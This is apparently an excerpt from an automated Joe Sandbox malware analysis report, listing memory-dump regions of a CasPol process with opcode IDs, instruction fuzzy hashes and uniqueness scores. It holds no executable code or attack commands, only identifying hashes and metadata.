                                                                                                                        • Instruction Fuzzy Hash: E111C135705622CFD3199B69C8A453ABBA2FF8576171940A9DA47DB350DF31DC01C7D0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fc7b444f61a523bd348bb301d9d454b08d1d4c65d6ae3772640b711593baa329
                                                                                                                        • Instruction ID: 9532cd0bfd0db3764caa21cff6413e4333975f658b64b4a4b1a480977566b409
                                                                                                                        • Opcode Fuzzy Hash: fc7b444f61a523bd348bb301d9d454b08d1d4c65d6ae3772640b711593baa329
                                                                                                                        • Instruction Fuzzy Hash: 4C112E35B101298FCB40EFB8C8899AEBBF5FB8D6107548029E51AD3304EF759D16CB91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0e923aacb46e3a6ceaf5c17c46bab29fdda36b90ab7f5a8eab2bb683079575bb
                                                                                                                        • Instruction ID: c2be5bbc2385aff29fcfd3743a0304396cf5aef62abf80b4b1ebcc3b1af6590e
                                                                                                                        • Opcode Fuzzy Hash: 0e923aacb46e3a6ceaf5c17c46bab29fdda36b90ab7f5a8eab2bb683079575bb
                                                                                                                        • Instruction Fuzzy Hash: E6116A75A1121A9FCB019FA9C8405BFBBB9FF49310F54446AEA21E3240E7749A11CBA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5750009230.000000001D8AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AD000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_1d8ad000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5b344fcc06c1ec04462247773d2889c1eac33697faa558e0acf8bb33b35aa556
                                                                                                                        • Instruction ID: 126883212dc48712234e545880247ad679bd9e0cb37badacaf8260a0793f2b37
                                                                                                                        • Opcode Fuzzy Hash: 5b344fcc06c1ec04462247773d2889c1eac33697faa558e0acf8bb33b35aa556
                                                                                                                        • Instruction Fuzzy Hash: 5011D076505281DFCB02CF14D9C4F26BF72FB84320F24C5A9E9094B656D33AE45ACBA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5750156942.000000001D8BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8BD000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_1d8bd000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f2e9015f96370ead39249aecec714e87af078064c6995370018afb27c8b89097
                                                                                                                        • Instruction ID: eb8c3d607be871f9bd265a4ab9d35062e958c39675621efb2e70a8a3250974c1
                                                                                                                        • Opcode Fuzzy Hash: f2e9015f96370ead39249aecec714e87af078064c6995370018afb27c8b89097
                                                                                                                        • Instruction Fuzzy Hash: 42119075504284DFCB02CF14D5C4B15FB61FB88714F24C6ADE8494B796C37AD45ACB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4b567414b8a25d339f15549e868ca327efe2d9893bd548b93e72121c411f4611
                                                                                                                        • Instruction ID: dee580a3327f80d9d297cdfc1fc20b208108eb720a756d0682d2eb8c988172da
                                                                                                                        • Opcode Fuzzy Hash: 4b567414b8a25d339f15549e868ca327efe2d9893bd548b93e72121c411f4611
                                                                                                                        • Instruction Fuzzy Hash: 87112E35B141298FCB40EFB8C8895AEB7F5BF892207548029E51AE3300EF759D158B91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 896192b859d97b5e796e7f7f5b65a0191e33bf9ddd33dcbe08f429d4f8347308
                                                                                                                        • Instruction ID: 9659607cd39086b474a50fdfc160f056e4d6161879f2316d3b77ee2702ec417a
                                                                                                                        • Opcode Fuzzy Hash: 896192b859d97b5e796e7f7f5b65a0191e33bf9ddd33dcbe08f429d4f8347308
                                                                                                                        • Instruction Fuzzy Hash: D6115B31B102298FCB40EBFCC8859EEB7F5BF896107848429D10AE7750EB349D12CB91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c8d4c944ca478b16df1e1590963ed634058eca4ef99e5181c0cbaaac27b71954
                                                                                                                        • Instruction ID: f14e6c3718f678045a58c0a1617ee6c3e6908e30d258c74c569993244f29fd1b
                                                                                                                        • Opcode Fuzzy Hash: c8d4c944ca478b16df1e1590963ed634058eca4ef99e5181c0cbaaac27b71954
                                                                                                                        • Instruction Fuzzy Hash: 14115B31B102298FCB40EBBCC8859AEB7F5BF992107948429D51AE7310EB349D068B91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 67fe39639bb57196584effbb0dfc7f0696ad95bc8568851cb05f8355ace83eb7
                                                                                                                        • Instruction ID: bf3de3316b7569ad1ade51d45f145cea35c5e43021bb64dc11db4e98b60d4818
                                                                                                                        • Opcode Fuzzy Hash: 67fe39639bb57196584effbb0dfc7f0696ad95bc8568851cb05f8355ace83eb7
                                                                                                                        • Instruction Fuzzy Hash: 10115B31F102298FCB80EFBCC8859AEB7F5BF996107948029D51AE7714EB349D128B91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dbce68b957a57e84516d18fa36d91148e045e4e460ca173b37be8f1a48247060
                                                                                                                        • Instruction ID: edd2e88ecf00448cc38db26ae78c52f513b4ef611bc325ebb6a45e2c79e729e1
                                                                                                                        • Opcode Fuzzy Hash: dbce68b957a57e84516d18fa36d91148e045e4e460ca173b37be8f1a48247060
                                                                                                                        • Instruction Fuzzy Hash: DD01D636704125ABDB458E999810ABF3BABEBC8750B198029F705C7340DEB2EC2187E1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a246e1bec236c84f87047969296efe559e9950897f3fd9c4ca47e60b3dc96c26
                                                                                                                        • Instruction ID: 155111191fcc211bf30081e6c13ae97f4ad572a3d76ba70415cf6296365d1b2c
                                                                                                                        • Opcode Fuzzy Hash: a246e1bec236c84f87047969296efe559e9950897f3fd9c4ca47e60b3dc96c26
                                                                                                                        • Instruction Fuzzy Hash: 74F0C836604119BFDB058E99DC00AEF7FAAEFC8750F188025F704C3240DB72D8229BA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d7d12b4b20a4be4b0ee448c56c9199635f6a6e4ca30178be52c8acf86f1d50fd
                                                                                                                        • Instruction ID: 516a83b86c9efead7c6e2d1afa13702bdd05844e716163a86cdb06ffd32faef4
                                                                                                                        • Opcode Fuzzy Hash: d7d12b4b20a4be4b0ee448c56c9199635f6a6e4ca30178be52c8acf86f1d50fd
                                                                                                                        • Instruction Fuzzy Hash: 01F03776E012299FCB80EFB998451EE7BF8FB8C631B44007AE519D3204E6705A128FE0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4262ee6e4724c0466d21b14cbab96cf1abdbd8b8421f9beb1afba4e592a27e45
                                                                                                                        • Instruction ID: fd907a5eb9f7b1231770dbc51996aead0fb7b7364b3fde14e719e3dab6a7a6d1
                                                                                                                        • Opcode Fuzzy Hash: 4262ee6e4724c0466d21b14cbab96cf1abdbd8b8421f9beb1afba4e592a27e45
                                                                                                                        • Instruction Fuzzy Hash: 95F05870C1430AEFCB90EFB884453AEBFF0AF09304F6089AAC514E6241E7B546529FA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 81c72fe88f80fdb040a059a6175b4d32e4c080678822b82c5cb40366c4484dee
                                                                                                                        • Instruction ID: 6b6fdc27613d84389d66004e28985c89532cfa38f495b83f2ec4ca6abe6d202c
                                                                                                                        • Opcode Fuzzy Hash: 81c72fe88f80fdb040a059a6175b4d32e4c080678822b82c5cb40366c4484dee
                                                                                                                        • Instruction Fuzzy Hash: A2E09272E002299F8B40AFBC98041AE7AF8FA88220B04007AD519D3200EA304A118BD0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: \;k$\;k$\;k$\;k
                                                                                                                        • API String ID: 0-2739306711
                                                                                                                        • Opcode ID: 93deb49455ba42e62153632bc19da99d916d69be9984c83720a8165a1de2a00c
                                                                                                                        • Instruction ID: ad53f259b43ac9f8297e1f361540fb7a9a2597ace04d13935bb91f4afddbdbe0
                                                                                                                        • Opcode Fuzzy Hash: 93deb49455ba42e62153632bc19da99d916d69be9984c83720a8165a1de2a00c
                                                                                                                        • Instruction Fuzzy Hash: 04018432730012CF87748E2CC07592677EAAF897A0765417AE616CB376EA71DC42C791
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%